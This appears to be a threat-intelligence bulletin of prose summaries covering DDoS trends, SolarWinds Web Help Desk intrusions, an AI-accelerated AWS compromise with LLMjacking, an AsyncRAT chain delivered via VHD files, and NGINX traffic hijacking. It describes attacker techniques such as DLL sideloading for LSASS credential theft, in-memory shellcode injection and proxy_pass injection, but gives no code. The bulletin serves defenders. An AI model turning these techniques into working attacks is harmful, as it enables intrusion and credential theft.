Threat Alerts

Distributed denial-of-service (DDoS) activity increased sharply in 2025, with total attacks rising 121% year over year to 47.1 million, reflecting a significant escalation in both frequency and scale. Late-year activity included record-setting hyper-volumetric events, such as a 31.4 Tbps attack and the “Night Before Christmas” campaign in December, which delivered sustained HTTP floods exceeding 20 million requests per second and peaked at 9 Bpps and 24 Tbps. These spikes were largely attributed to the Aisuru-Kimwolf botnet, a large network of an estimated 1–4 million compromised Android TV devices. The continued growth of both network-layer and application-layer DDoS attacks increases risk to telecommunications providers, service operators, and other critical infrastructure, where service disruption and latency have immediate operational impact.

Threat actors have exploited internet-exposed SolarWinds Web Help Desk (WHD) instances to establish initial access and move laterally toward high-value organizational assets, demonstrating how a single exposed application can lead to full domain compromise when vulnerabilities remain unpatched or insufficiently monitored. The attacks potentially involved CVE-2025-40551 and CVE-2025-40536, disclosed on January 28, 2026, or the previously known CVE-2025-26399, though the exact vulnerability remains unconfirmed since the December 2025 attacks occurred on machines vulnerable to both old and new CVEs simultaneously. Attackers employed living-off-the-land techniques, legitimate administrative tools, and low-noise persistence mechanisms, emphasizing the need for defense in depth, timely patching of internet-facing services, and behavior-based detection across identity, endpoint, and network layers.

Following successful exploitation that enabled unauthenticated remote code execution on internet-facing deployments, the compromised WHD service spawned PowerShell to leverage BITS for payload download and execution, with downloaded binaries installing components of Zoho ManageEngine, a legitimate remote monitoring and management solution. The attackers enumerated sensitive domain users and groups, including Domain Admins, before establishing reverse SSH and RDP access for persistence. In some environments, attackers created scheduled tasks to launch QEMU virtual machines under the SYSTEM account at startup, hiding malicious activity within virtualized environments while exposing SSH access via port forwarding. On certain hosts, threat actors used DLL sideloading by abusing wab.exe to load a malicious sspicli.dll, enabling access to LSASS memory and credential theft while reducing detections focused on well-known dumping tools.

Activity escalated to DCSync from the original access host in at least one case, indicating the use of high-privilege credentials to request password data from a domain controller. The entire intrusion chain relied heavily on living-off-the-land techniques and legitimate administrative tools, making detection more challenging through traditional security controls. This incident illustrates the critical vulnerability window created by exposed enterprise applications and the cascading impact when initial access translates into privileged credential compromise and domain-wide control.

Threat actors leveraged AI technologies to compromise an AWS environment in under 10 minutes, demonstrating how large language models accelerate cyberattacks. The attackers used generative AI to automate reconnaissance, generate malicious code, and make real-time decisions throughout their operation.

The attack began when hackers discovered credentials stored in public AWS S3 buckets. Using these credentials, they executed Lambda function code injection to escalate privileges and hijack user accounts, ultimately gaining full administrative access. The attackers moved laterally through 19 identities across 14 sessions, collecting sensitive data from multiple AWS services including secrets, system parameters, logs, and function source code. The speed and sophistication of their code, written with comprehensive exception handling, strongly indicated AI generation.

After establishing administrative control, the threat actors shifted focus to resource abuse, launching an LLMjacking attack against Amazon Bedrock to access various AI models. They attempted GPU hijacking by trying to spin up high-performance computing instances, successfully deploying a smaller instance that would have cost the victim $23,600 monthly if undetected. This incident represents an evolution in the threat landscape, where AI-powered attacks can complete complex operations from initial access to full compromise in minutes rather than hours or days.

A sophisticated malware campaign has been identified that employs an uncommon chain of attack techniques, including VHD file abuse, script-based execution, self-parsing batch logic, fileless PowerShell injections, and ultimately deploys a Remote Access Trojan (RAT). The attack leverages IPFS-hosted VHD files, extreme script obfuscation, runtime decryption, and in-memory shellcode injection into trusted Windows processes, never dropping a decrypted binary to disk . Modern malware campaigns increasingly rely on trusted file formats, script abuse, and memory-resident execution to bypass traditional security controls.
The infection chain begins with a phishing email delivering a Virtual Hard Disk (VHD) hosted on IPFS infrastructure and progresses through a sequence of Windows Script Files (WSF), heavily obfuscated batch scripts, and self-parsing PowerShell loaders. The final payload is delivered as encrypted x64 shellcode, which is injected directly into trusted Windows processes and executed entirely in memory—without ever dropping a decrypted executable to disk . Malware authors package payloads inside container formats like VHD or image files to bypass the mark-of-the-web (MotW). When a VHD file is downloaded, the VHD file itself gets the mark of the web, but when the user double clicks the VHD file to mount it, the file system inside the VHD is treated as a separate volume and the files inside do not inherit the mark of the web from the container, appearing as local files residing on a local disk .
Execution flows through WSF, batch, and PowerShell scripts, avoiding traditional malware binaries during early stages. The batch stage employs environment variable explosion and reads its own contents to extract an encrypted payload. PowerShell strings are protected using a combination of Unicode junk insertion, Base64 encoding, rolling XOR decryption, and ROT-style character shifting, ensuring no meaningful indicators exist in cleartext. The final malware stage is stored as noise-polluted Base64 data, decoded into raw shellcode and never written to disk in decrypted form, with the loader injecting shellcode into trusted, Microsoft-signed processes using native Win32 APIs . Dynamic analysis confirmed that the shellcode deploys a fully functional AsyncRAT implant capable of long-term surveillance, data exfiltration, and follow-on attacks. Anti-sandbox checks, persistence rotation, execution throttling, and memory-only payloads collectively reduce detection and forensic visibility.

An active web traffic hijacking campaign has been identified targeting NGINX deployments and management panels such as Baota, where malicious configuration changes enable interception of legitimate user traffic and redirection to attacker-controlled backend servers. The activity primarily impacts Asian top-level domains—including .in, .id, .pe, .bd, .edu, .gov, and .th as well as Chinese hosting infrastructure, highlighting geographically focused targeting. By exploiting weak configurations or previously compromised environments, threat actors effectively position themselves as adversaries-in-the-middle, silently rerouting web sessions without user awareness and turning trusted web infrastructure into a persistent traffic interception mechanism.

The campaign uses a multi-stage automated toolkit with discovery, persistence and configuration-injection capabilities. Initial scripts orchestrate execution and can establish raw TCP connections to send HTTP requests when standard utilities are unavailable, while enumeration logic searches for management panel configuration paths and prior proxy injections before proceeding. Malicious routines dynamically select domain-specific templates, back up original configurations and overwrite NGINX server directives with injected location and proxy_pass rules that redirect traffic through attacker infrastructure. To avoid service disruption, scripts attempt graceful NGINX reloads before fallback restarts, ensuring malicious rules remain active. A reporting component inventories hijacked domains, injected templates and redirection endpoints, storing this intelligence in temporary mapping files that are later exfiltrated to command-and-control servers via curl or raw TCP channels. The campaign demonstrates how manipulation of foundational web server configurations can provide durable, covert traffic interception across targeted hosting environments.

Unsupported network edge devices, including routers, firewalls, and switches, have been flagged by U.S. cybersecurity authorities as a persistent exploitation risk due to the absence of vendor security updates and exposure to newly discovered vulnerabilities. A new federal directive mandates rapid identification and replacement of end-of-life edge infrastructure across government networks, reflecting widespread exploitation of unsupported perimeter devices by advanced threat actors. While the requirement applies to U.S. federal agencies, edge devices remain a high-value target in ongoing attacks—particularly by Chinese state-linked threat groups—making this risk relevant across all sectors operating exposed or legacy network infrastructure.